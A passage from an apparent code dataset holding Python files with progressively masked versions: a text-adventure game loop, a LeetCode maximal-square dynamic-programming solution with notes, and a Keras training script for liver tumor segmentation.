"step-4": "from room import Room\nfrom player import Player\nfrom item import Item\nitems = {'scimitar': Item('Scimitar', '+7 Attack'), 'mace': Item('Mace',\n '+13 Attack'), 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'), 'chainmail':\n Item('Chainmail', '+15 Defense'), 'gold_plate': Item('Gold Plate',\n '+25 Defense'), 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'), 'gold': Item(\n 'Gold', 'Currency for other items from vendors'), 'demon_heart': Item(\n 'Demon Heart', 'Bestows owner with great power')}\nroom = {'outside': Room('Outside Cave Entrance',\n 'North of you, the cave mount beckons', [items['scimitar'], items[\n 'health_potion']]), 'foyer': Room('Foyer',\n \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\"\n , [items['tower_shield'], items['chainmail']]), 'overlook': Room(\n 'Grand Overlook',\n \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\"\n , [items['mace'], items['mana_potion']]), 'narrow': Room(\n 'Narrow Passage',\n \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\"\n , [items['gold_plate'], items['heraldic_shield']]), 'treasure': Room(\n 'Treasure Chamber',\n \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. 
The only exit is to the south.\"\"\"\n , [items['gold'], items['demon_heart']])}\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\nplayer = Player(room['outside'])\nsuppressRoomPrint = False\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print(player.location)\n print(\n f\"\"\"\n{player.location.name}\n {player.location.description}\n {player.location.getItems()}\n\"\"\"\n )\n inp = input('What is your command: ')\n if inp == 'q':\n break\n if inp == 'n' or inp == 's' or inp == 'w' or inp == 'e':\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)\n",
"step-5": "from room import Room\nfrom player import Player\nfrom item import Item\n# Declare all the rooms\nitems = {\n 'scimitar': Item('Scimitar', '+7 Attack'),\n 'mace': Item('Mace', '+13 Attack'),\n 'tower_shield': Item('Tower Shield', '+8 Block'),\n 'heraldic_shield': Item('Heraldic Shield', '+12 Block'),\n 'chainmail': Item('Chainmail', '+15 Defense'),\n 'gold_plate': Item('Gold Plate', '+25 Defense'),\n 'health_potion': Item('Health Potion', 'Heal 10 HP'),\n 'mana_potion': Item('Mana Potion', 'Restore 20 Mana'),\n 'gold': Item('Gold', 'Currency for other items from vendors'),\n 'demon_heart': Item('Demon Heart', 'Bestows owner with great power')\n}\n\nroom = {\n 'outside': Room(\"Outside Cave Entrance\",\n \"\"\"North of you, the cave mount beckons\"\"\",\n [items['scimitar'], items['health_potion']]),\n\n 'foyer': Room(\"Foyer\", \"\"\"Dim light filters in from the south. Dusty\npassages run north and east.\"\"\",\n[items['tower_shield'], items['chainmail']]),\n\n 'overlook': Room(\"Grand Overlook\", \"\"\"A steep cliff appears before you, falling\ninto the darkness. Ahead to the north, a light flickers in\nthe distance, but there is no way across the chasm.\"\"\",\n[items['mace'], items['mana_potion']]),\n\n 'narrow': Room(\"Narrow Passage\", \"\"\"The narrow passage bends here from west\nto north. The smell of gold permeates the air.\"\"\",\n[items['gold_plate'], items['heraldic_shield']]),\n\n 'treasure': Room(\"Treasure Chamber\", \"\"\"You've found the long-lost treasure\nchamber! Sadly, it has already been completely emptied by\nearlier adventurers. 
The only exit is to the south.\"\"\",\n[items['gold'], items['demon_heart']]),\n}\n\n# Link rooms together\nroom['outside'].n_to = room['foyer']\nroom['foyer'].s_to = room['outside']\nroom['foyer'].n_to = room['overlook']\nroom['foyer'].e_to = room['narrow']\nroom['overlook'].s_to = room['foyer']\nroom['narrow'].w_to = room['foyer']\nroom['narrow'].n_to = room['treasure']\nroom['treasure'].s_to = room['narrow']\n\n# Main\n\nplayer = Player(room['outside'])\n\nsuppressRoomPrint = False\n\nwhile True:\n if suppressRoomPrint:\n suppressRoomPrint = False\n else:\n print (player.location)\n print (f'\\n{player.location.name}\\n {player.location.description}\\n {player.location.getItems()}\\n')\n inp = input(\"What is your command: \")\n\n if inp == \"q\":\n break\n if inp == \"n\" or inp == \"s\" or inp == \"w\" or inp == \"e\":\n newRoom = player.location.getRoomInDirection(inp)\n if newRoom == None:\n print('\\x1b[1;37;41m + \\nImpossible, try again.\\n\\x1b[0m')\n suppressRoomPrint = True\n else:\n player.change_location(newRoom)",
"step-ids": [
0,
1,
2,
3,
4
]
}
|
[
0,
1,
2,
3,
4
] |
"""
Given a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.
Example:
Input:
1 0 1 0 0
1 0 1 1 1
1 1 1 1 1
1 0 0 1 0
Output: 4
"""
# 196ms. 98 percentile
class Solution:
    def maximalSquare(self, matrix: "List[List[str]]") -> int:
        """Return the area of the largest all-'1' square in a binary char matrix.

        Rolling 1-D DP: dp[j] holds the largest square side ending at the cell
        directly above, prevSquare the side ending at the upper-left diagonal.
        O(rows*cols) time, O(cols) extra space.

        Note: the annotation is a string because ``typing.List`` was never
        imported here; quoting it avoids a NameError at definition time.
        """
        if not matrix:
            return 0
        # One extra trailing slot that is never written, so dp[j - 1] wraps
        # around to a harmless 0 when j == 0.
        dp = [0] * (len(matrix[0]) + 1)
        longestSide = 0
        for i in range(len(matrix)):
            prevSquare = 0  # dp value of the (i-1, j-1) diagonal neighbour
            for j in range(len(matrix[0])):
                # Save the pre-update dp[j]: it becomes the diagonal value
                # for the next column (dp is overwritten in place).
                temp = dp[j]
                if matrix[i][j] == '1':
                    # Side here extends the min of top, left and diagonal squares.
                    dp[j] = 1 + min(dp[j], dp[j - 1], prevSquare)
                    longestSide = max(longestSide, dp[j])
                else:
                    dp[j] = 0
                prevSquare = temp
        return longestSide * longestSide
"""
Notes:
Two hard things in this problem. The first is the logic for the dp, although after the fact
it seems pretty straightforward imo.
At any element you can check if you have a 2 by 2 square by looking at its neighbors. So anywhere you see
1 1
1 1
you're going to replace the bottom right corner with a 2. Note we're going top down and left to right...
So if you see
2 2
2 1
...then you know that you actually have
1 1 1
1 2 2
1 2 1
meaning you can actually put 3 in the corner.
On the other hand, if any of the neighbors are 1's, then you won't have the full cube. Implying that
at each spot, if it's a 1, you take the min of the three neighbors + 1.
The second hard thing is just dealing with the fact the input is characters not ints...annoying imo. The second
solution up there just uses a standard 1d dp array to keep track of the last row processed in terms of ints...which
is all we need. So we can avoid casting anything.
The first solution only casts the first row and the first column.
Most of it is straightforward. The one thing I want to note is the temp variable switch. Basically because our dp is
a single array, when we're processing element i, we've already replaced element i-1 with an updated value. That's a problem
because the i-1 value represents the j-1,i-1 value for the ith element in the dp. So we use that little temp switch to
skirt the issue.
"""
|
normal
|
{
"blob_id": "e5d31a2ea4a8615d24626be2414f5ae49b9cd6a1",
"index": 184,
"step-1": "<mask token>\n",
"step-2": "<mask token>\n\n\nclass Solution:\n <mask token>\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\nclass Solution:\n\n def maximalSquare(self, matrix: List[List[str]]) ->int:\n if not matrix:\n return 0\n dp = [0] * (len(matrix[0]) + 1)\n longestSide = 0\n for i in range(len(matrix)):\n prevSquare = 0\n for j in range(len(matrix[0])):\n temp = dp[j]\n if matrix[i][j] == '1':\n dp[j] = 1 + min(dp[j], dp[j - 1], prevSquare)\n longestSide = max(longestSide, dp[j])\n else:\n dp[j] = 0\n prevSquare = temp\n return longestSide * longestSide\n\n\n<mask token>\n",
"step-4": "\"\"\"\nGiven a 2D binary matrix filled with 0's and 1's, find the largest square containing only 1's and return its area.\n\nExample:\n\nInput: \n\n1 0 1 0 0\n1 0 1 1 1\n1 1 1 1 1\n1 0 0 1 0\n\nOutput: 4\n\"\"\"\n# 196ms. 98 percentile\nclass Solution:\n def maximalSquare(self, matrix: List[List[str]]) -> int:\n if not matrix:\n return 0\n dp = [0]*(len(matrix[0]) + 1)\n longestSide = 0\n for i in range(len(matrix)):\n prevSquare =0\n for j in range(len(matrix[0])):\n temp = dp[j]\n if matrix[i][j] == '1':\n dp[j] = 1 + min(dp[j], dp[j-1], prevSquare)\n longestSide = max(longestSide, dp[j])\n else:\n dp[j] = 0\n \n prevSquare = temp\n \n return longestSide*longestSide\n\n\n\"\"\"\nNotes:\n\nTwo hard things in this problem. The first is the logic for the dp, although after the fact \nit seems pretty straightforward imo.\nAt any element you can check if you have a 2 by 2 square by looking at its neighbors. So anywhere you see\n1 1\n1 1\nyou're going to replace the bottom right corner with a 2. Note we're going top down and left to right...\nSo if you see\n2 2\n2 1 \n...then you know that you actually have\n1 1 1\n1 2 2\n1 2 1\nmeaning you can actually put 3 in the corner. \n\nOn the other hand, if any of the neighbors are 1's, then you won't have the full cube. Implying that\nat each spot, if it's a 1, you take the min of the three neighbors + 1. \n\n\nThe second hard thing is just dealing with the fact the input is characters not ints...annoying imo. The second\nsolution up there just uses a standard 1d dp array to keep track of the last row processed in terms of ints...which\nis all we need. So we can avoid casting anything. \n\nThe first solution only casts the first first row and the first column. \n\nMost of it is straightforwards. The one thing I want to note is that temp variable switch. Basically because our dp is\na single array, when we're processing element i, we've already replaced element i-1 with an updated value. 
That's a problem\nbecause the i-1 value represents the j-1,i-1 value for the ith element in the dp. So we use that little temp switch to \nskirt the issue. \n\"\"\"",
"step-5": null,
"step-ids": [
0,
1,
2,
3
]
}
|
[
0,
1,
2,
3
] |
<|reserved_special_token_0|>
def train():
    """Train CGBS_Net on RECIST-guided liver tumor data, saving the best weights."""
    batch_size = 4
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'

    # Augmented training stream and non-augmented dev stream.
    train_gen = trainGenerator(batch_size, data_path='/data', folder='train',
                               aug_dict=aug_args, seed=1, interaction='RECIST')
    dev_gen = trainGenerator(batch_size, data_path='/data', folder='dev',
                             aug_dict=no_aug_args, seed=1, interaction='RECIST')
    test_gen = testGenerator(test_path='test_path', interaction='RECIST')

    model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
    model.summary()

    optimizer = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
    track_lr = get_lr_metric(optimizer)
    # Two heads: segmentation (dice loss) and shape (binary cross-entropy),
    # weighted equally.
    model.compile(
        optimizer=optimizer,
        loss={'out_seg': dice_coef_loss, 'out_shape': losses.binary_crossentropy},
        loss_weights={'out_seg': 1, 'out_shape': 1},
        metrics=[dice_coef, track_lr])

    # Callbacks: CSV history log, best-checkpoint saving, LR decay on plateau.
    logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
    checkpoint = ModelCheckpoint(
        './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5',
        monitor='val_out_seg_loss', verbose=0, save_best_only=True,
        save_weights_only=True, mode='auto', period=1)
    lr_schedule = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
                                    patience=50, mode='auto')

    steps = int(5000 / batch_size)
    model.fit_generator(generator=train_gen, steps_per_epoch=steps,
                        epochs=500, validation_data=dev_gen,
                        validation_steps=steps, verbose=2,
                        callbacks=[checkpoint, logger, lr_schedule])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_lr_metric(optimizer):
    """Build a Keras-style metric that reports the optimizer's current learning rate.

    The returned function closes over ``optimizer`` and ignores its two
    arguments, so every call reads the live ``optimizer.lr`` value. Its name
    stays ``lr`` because Keras derives the logged metric name from __name__.
    """
    def lr(y_true, y_pred):
        del y_true, y_pred  # unused; signature dictated by the metric API
        return optimizer.lr

    return lr
def train():
    """Train CGBS_Net on RECIST-guided data and checkpoint the best weights."""
    batch_size = 4
    # Pin the run to the first GPU.
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    # Augmented training generator vs. non-augmented dev generator.
    trainGene = trainGenerator(batch_size, data_path='/data', folder=
        'train', aug_dict=aug_args, seed=1, interaction='RECIST')
    devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
        aug_dict=no_aug_args, seed=1, interaction='RECIST')
    # NOTE(review): testGene is created but never used below -- confirm
    # whether testGenerator has required side effects before removing.
    testGene = testGenerator(test_path='test_path', interaction='RECIST')
    # 4-channel 256x256 input -- presumably image plus interaction channels;
    # TODO confirm against CGBS_Net's definition.
    model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
    model.summary()
    opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
    # Extra metric that logs the optimizer's current learning rate.
    lr_metric = get_lr_metric(opt)
    # Two heads: segmentation (dice loss) and shape (binary cross-entropy),
    # weighted equally.
    model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
        'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
        1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
    csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
    # Save weights whenever val_out_seg_loss improves.
    model_checkpoint = ModelCheckpoint(
        './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
        ='val_out_seg_loss', verbose=0, save_best_only=True,
        save_weights_only=True, mode='auto', period=1)
    # Divide the LR by 10 after 50 epochs without validation improvement.
    reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
        patience=50, mode='auto')
    model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
        batch_size), epochs=500, validation_data=devGene, validation_steps=
        int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
        csv_logger, reduce_lr])
<|reserved_special_token_0|>
<|reserved_special_token_1|>
<|reserved_special_token_0|>
def get_lr_metric(optimizer):
    """Return a Keras-style metric function reporting the optimizer's learning rate."""
    def lr(y_true, y_pred):
        # Arguments are ignored; the closure just exposes the current LR.
        return optimizer.lr
    return lr
def train():
    """Train CGBS_Net on RECIST-guided data and checkpoint the best weights."""
    batch_size = 4
    # Pin the run to the first GPU.
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    # Augmented training generator vs. non-augmented dev generator.
    trainGene = trainGenerator(batch_size, data_path='/data', folder=
        'train', aug_dict=aug_args, seed=1, interaction='RECIST')
    devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
        aug_dict=no_aug_args, seed=1, interaction='RECIST')
    # NOTE(review): testGene is created but never used below -- confirm
    # whether testGenerator has required side effects before removing.
    testGene = testGenerator(test_path='test_path', interaction='RECIST')
    # 4-channel 256x256 input -- presumably image plus interaction channels;
    # TODO confirm against CGBS_Net's definition.
    model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
    model.summary()
    opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
    # Extra metric that logs the optimizer's current learning rate.
    lr_metric = get_lr_metric(opt)
    # Two heads: segmentation (dice loss) and shape (binary cross-entropy),
    # weighted equally.
    model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
        'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
        1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
    csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
    # Save weights whenever val_out_seg_loss improves.
    model_checkpoint = ModelCheckpoint(
        './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
        ='val_out_seg_loss', verbose=0, save_best_only=True,
        save_weights_only=True, mode='auto', period=1)
    # Divide the LR by 10 after 50 epochs without validation improvement.
    reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
        patience=50, mode='auto')
    model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
        batch_size), epochs=500, validation_data=devGene, validation_steps=
        int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
        csv_logger, reduce_lr])


# Training starts when the module is executed.
train()
<|reserved_special_token_1|>
from liver_tumor_segmentation.CGBS_Net import *
from liver_tumor_segmentation.loss import *
from keras.optimizers import *
from liver_tumor_segmentation.CGBS_data_generator import *
from keras.callbacks import *
import os
from keras.callbacks import ReduceLROnPlateau
from keras import losses
from configuration import *
def get_lr_metric(optimizer):
    """Return a Keras-style metric function reporting the optimizer's learning rate."""
    def lr(y_true, y_pred):
        # Arguments are ignored; the closure just exposes the current LR.
        return optimizer.lr
    return lr
def train():
    """Train CGBS_Net on RECIST-guided data and checkpoint the best weights."""
    batch_size = 4
    # Pin the run to the first GPU.
    os.environ['CUDA_VISIBLE_DEVICES'] = '0'
    # Augmented training generator vs. non-augmented dev generator.
    trainGene = trainGenerator(batch_size, data_path='/data', folder=
        'train', aug_dict=aug_args, seed=1, interaction='RECIST')
    devGene = trainGenerator(batch_size, data_path='/data', folder='dev',
        aug_dict=no_aug_args, seed=1, interaction='RECIST')
    # NOTE(review): testGene is created but never used below -- confirm
    # whether testGenerator has required side effects before removing.
    testGene = testGenerator(test_path='test_path', interaction='RECIST')
    # 4-channel 256x256 input -- presumably image plus interaction channels;
    # TODO confirm against CGBS_Net's definition.
    model = CGBS_Net(input_shape=(256, 256, 4), rate=3)
    model.summary()
    opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)
    # Extra metric that logs the optimizer's current learning rate.
    lr_metric = get_lr_metric(opt)
    # Two heads: segmentation (dice loss) and shape (binary cross-entropy),
    # weighted equally.
    model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,
        'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg':
        1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
    csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)
    # Save weights whenever val_out_seg_loss improves.
    model_checkpoint = ModelCheckpoint(
        './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor
        ='val_out_seg_loss', verbose=0, save_best_only=True,
        save_weights_only=True, mode='auto', period=1)
    # Divide the LR by 10 after 50 epochs without validation improvement.
    reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,
        patience=50, mode='auto')
    model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /
        batch_size), epochs=500, validation_data=devGene, validation_steps=
        int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,
        csv_logger, reduce_lr])


# Training starts when the module is executed.
train()
<|reserved_special_token_1|>
from liver_tumor_segmentation.CGBS_Net import *
from liver_tumor_segmentation.loss import *
from keras.optimizers import *
from liver_tumor_segmentation.CGBS_data_generator import *
from keras.callbacks import *
import os
from keras.callbacks import ReduceLROnPlateau
from keras import losses
from configuration import *
def get_lr_metric(optimizer):
    """Return a Keras-style metric function reporting the optimizer's learning rate."""
    def lr(y_true, y_pred):
        # Arguments are ignored; the closure just exposes the current LR.
        return optimizer.lr
    return lr
def train():
batch_size = 4 #4 for single GPU; 8 for two GPUs
os.environ["CUDA_VISIBLE_DEVICES"] = '0'
trainGene = trainGenerator(batch_size, data_path='/data',
folder='train', aug_dict=aug_args, seed = 1, interaction='RECIST')
devGene = trainGenerator(batch_size, data_path='/data',
folder='dev', aug_dict=no_aug_args, seed = 1, interaction='RECIST')
testGene = testGenerator(test_path='test_path', interaction='RECIST')
model = CGBS_Net(input_shape=(256, 256, 4),rate=3)
model.summary()
# GPU_COUNT = 2
# model = multi_gpu_model(original_model, GPU_COUNT)
opt=SGD(lr=4e-4, decay=1e-6, momentum=0.9, nesterov=True)
lr_metric = get_lr_metric(opt)
model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss, 'out_shape': losses.binary_crossentropy},
loss_weights={'out_seg': 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])
csv_logger = CSVLogger('./Models/'+'CGBS_Net.csv', append=True) # ss-0.01
# tensorboard = TensorBoard(log_dir='./tmp/graph', write_graph=True, write_images=True)
# earlystopping = EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')
model_checkpoint = ModelCheckpoint(
'./Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5',
monitor='val_out_seg_loss',
verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1)
reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1, patience=50, mode='auto')
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000/batch_size),
epochs=500, validation_data=devGene,
validation_steps=int(5000/batch_size), verbose=2,
callbacks=[model_checkpoint, csv_logger, reduce_lr])
train()
|
flexible
|
{
"blob_id": "8c17f2c770c24bbf8c73628c6740c0b866e6b1c0",
"index": 9047,
"step-1": "<mask token>\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\n<mask token>\n",
"step-2": "<mask token>\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\n<mask token>\n",
"step-3": "<mask token>\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\ntrain()\n",
"step-4": "from liver_tumor_segmentation.CGBS_Net import *\nfrom liver_tumor_segmentation.loss import *\nfrom keras.optimizers import *\nfrom liver_tumor_segmentation.CGBS_data_generator import *\nfrom keras.callbacks import *\nimport os\nfrom keras.callbacks import ReduceLROnPlateau\nfrom keras import losses\nfrom configuration import *\n\n\ndef get_lr_metric(optimizer):\n\n def lr(y_true, y_pred):\n return optimizer.lr\n return lr\n\n\ndef train():\n batch_size = 4\n os.environ['CUDA_VISIBLE_DEVICES'] = '0'\n trainGene = trainGenerator(batch_size, data_path='/data', folder=\n 'train', aug_dict=aug_args, seed=1, interaction='RECIST')\n devGene = trainGenerator(batch_size, data_path='/data', folder='dev',\n aug_dict=no_aug_args, seed=1, interaction='RECIST')\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\n model = CGBS_Net(input_shape=(256, 256, 4), rate=3)\n model.summary()\n opt = SGD(lr=0.0004, decay=1e-06, momentum=0.9, nesterov=True)\n lr_metric = get_lr_metric(opt)\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss,\n 'out_shape': losses.binary_crossentropy}, loss_weights={'out_seg': \n 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\n csv_logger = CSVLogger('./Models/' + 'CGBS_Net.csv', append=True)\n model_checkpoint = ModelCheckpoint(\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5', monitor\n ='val_out_seg_loss', verbose=0, save_best_only=True,\n save_weights_only=True, mode='auto', period=1)\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1,\n patience=50, mode='auto')\n model.fit_generator(generator=trainGene, steps_per_epoch=int(5000 /\n batch_size), epochs=500, validation_data=devGene, validation_steps=\n int(5000 / batch_size), verbose=2, callbacks=[model_checkpoint,\n csv_logger, reduce_lr])\n\n\ntrain()\n",
"step-5": "from liver_tumor_segmentation.CGBS_Net import *\r\nfrom liver_tumor_segmentation.loss import *\r\nfrom keras.optimizers import *\r\nfrom liver_tumor_segmentation.CGBS_data_generator import *\r\nfrom keras.callbacks import *\r\nimport os\r\nfrom keras.callbacks import ReduceLROnPlateau\r\nfrom keras import losses\r\nfrom configuration import *\r\n\r\ndef get_lr_metric(optimizer):\r\n def lr(y_true, y_pred):\r\n return optimizer.lr\r\n\r\n return lr\r\ndef train():\r\n batch_size = 4 #4 for single GPU; 8 for two GPUs\r\n os.environ[\"CUDA_VISIBLE_DEVICES\"] = '0'\r\n\r\n trainGene = trainGenerator(batch_size, data_path='/data',\r\n folder='train', aug_dict=aug_args, seed = 1, interaction='RECIST')\r\n devGene = trainGenerator(batch_size, data_path='/data',\r\n folder='dev', aug_dict=no_aug_args, seed = 1, interaction='RECIST')\r\n testGene = testGenerator(test_path='test_path', interaction='RECIST')\r\n\r\n model = CGBS_Net(input_shape=(256, 256, 4),rate=3)\r\n model.summary()\r\n\r\n # GPU_COUNT = 2\r\n # model = multi_gpu_model(original_model, GPU_COUNT)\r\n\r\n opt=SGD(lr=4e-4, decay=1e-6, momentum=0.9, nesterov=True)\r\n lr_metric = get_lr_metric(opt)\r\n model.compile(optimizer=opt, loss={'out_seg': dice_coef_loss, 'out_shape': losses.binary_crossentropy},\r\n loss_weights={'out_seg': 1, 'out_shape': 1}, metrics=[dice_coef, lr_metric])\r\n\r\n csv_logger = CSVLogger('./Models/'+'CGBS_Net.csv', append=True) # ss-0.01\r\n # tensorboard = TensorBoard(log_dir='./tmp/graph', write_graph=True, write_images=True)\r\n # earlystopping = EarlyStopping(monitor='val_loss', patience=0, verbose=0, mode='auto')\r\n\r\n model_checkpoint = ModelCheckpoint(\r\n './Models/CGBS/{epoch:02d}-{val_out_seg_dice_coef:.4f}.h5',\r\n monitor='val_out_seg_loss',\r\n verbose=0, save_best_only=True, save_weights_only=True, mode='auto', period=1)\r\n reduce_lr = ReduceLROnPlateau(monitor='val_out_seg_loss', factor=0.1, patience=50, mode='auto')\r\n 
model.fit_generator(generator=trainGene, steps_per_epoch=int(5000/batch_size),\r\n epochs=500, validation_data=devGene,\r\n validation_steps=int(5000/batch_size), verbose=2,\r\n callbacks=[model_checkpoint, csv_logger, reduce_lr])\r\n\r\n\r\ntrain()\r\n\r\n",
"step-ids": [
1,
2,
3,
4,
5
]
}
|
